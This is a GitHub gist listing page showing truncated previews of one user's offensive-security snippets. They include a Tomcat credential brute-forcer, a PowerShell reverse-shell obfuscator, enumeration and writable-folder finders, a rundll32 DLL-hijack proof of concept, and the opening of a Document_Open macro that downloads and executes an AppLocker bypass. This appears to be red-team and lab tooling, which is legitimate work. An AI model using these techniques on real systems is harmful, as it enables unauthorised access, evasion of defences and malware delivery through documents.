Skip to content

Instantly share code, notes, and snippets.

Avatar

egre55 egre55

  • London
View GitHub Profile
@egre55
egre55 / tomcat_brute_force.py
Last active Nov 8, 2019
tomcat_brute_force
View tomcat_brute_force.py
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
@egre55
egre55 / simple_case_obfuscator.sh
Created Nov 1, 2018
simple_case_obfuscator.sh
View simple_case_obfuscator.sh
# simple case obfuscator
# author: @egre55
# usage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1
if [ "$1" == "" ]; then
printf "\nusage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1\n\n"
exit 0
fi
file=$1
@egre55
egre55 / IIS-LogParser.ps1
Last active Nov 1, 2018
IIS-LogParser.ps1
View IIS-LogParser.ps1
# author: @egre55
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)][string]$logfile
)
$host.UI.RawUI.BufferSize = new-object System.Management.Automation.Host.Size(600,20000)
while($true)
@egre55
egre55 / Get-SituationalAwareness.ps1
Last active Oct 11, 2018
Get-SituationalAwareness.ps1
View Get-SituationalAwareness.ps1
<#
Script will enumerate:
PowerShell Language Mode
Current user details
Current privileges
Domain and Forest functional levels
AD user information
AD computer information
@egre55
egre55 / find_writable_locations.bat
Created Oct 11, 2018
find_writable_locations.bat
View find_writable_locations.bat
@echo off
REM Script to find writable locations under C:\
C:
cd C:\TEMP\
echo Creating list of all directories and sub-directories
dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt
@egre55
egre55 / procmon.ps1
Last active Dec 20, 2019
procmon.ps1
View procmon.ps1
# Simple PowerShell process monitor
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
@egre55
egre55 / procmon.bat
Last active Oct 1, 2018
procmon.bat
View procmon.bat
REM Ugly file-based process monitor script. Non-PowerShell in case blocked
@echo off
:loop
del file1.txt 2> nul
del file2.txt 2> nul
for /f "usebackq skip=1 tokens=* delims= " %%i in (`wmic path win32_process get commandline ^| findstr /r /v "[^\ ]"`) do echo %%i >> file1.txt
@egre55
egre55 / calc.c
Created Jul 31, 2018
calc.c (calc.dll) by Holly Graceful @HollyGraceful
View calc.c
/*
cl.exe /LD calc.c
rundll32 shell32.dll,Control_RunDLL C:\Users\%username%\Desktop\calc.dll
calc.c by @HollyGraceful
https://www.gracefulsecurity.com/privesc-dll-hijacking/
*/
#include <windows.h>
int fireLazor()
{
@egre55
egre55 / macro_download_and_execute_rundll32_powershdll_powershell.vba
Last active Jul 11, 2020
macro - download and execute applocker bypass (rundll32 / powershdll / powershell)
View macro_download_and_execute_rundll32_powershdll_powershell.vba
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' PowerShdll.dll by @p3nt4
' https://github.com/p3nt4/PowerShdll
'
' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click
' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case)
Sub Document_Open()
@egre55
egre55 / locations_writable_by_non-admin_users_in_windows.txt
Last active Jul 11, 2020
locations_writable_by_non-admin_users_in_windows
View locations_writable_by_non-admin_users_in_windows.txt
## locations writable by non-admin users in Windows (Windows 10)
# default folders
C:\$Recycle.Bin\<USER SID> (whoami /user)
C:\Users\All Users (links to C:\ProgramData)
C:\PerfLogs
C:\ProgramData
C:\Windows\Tasks
C:\Windows\tracing
You can’t perform that action at this time.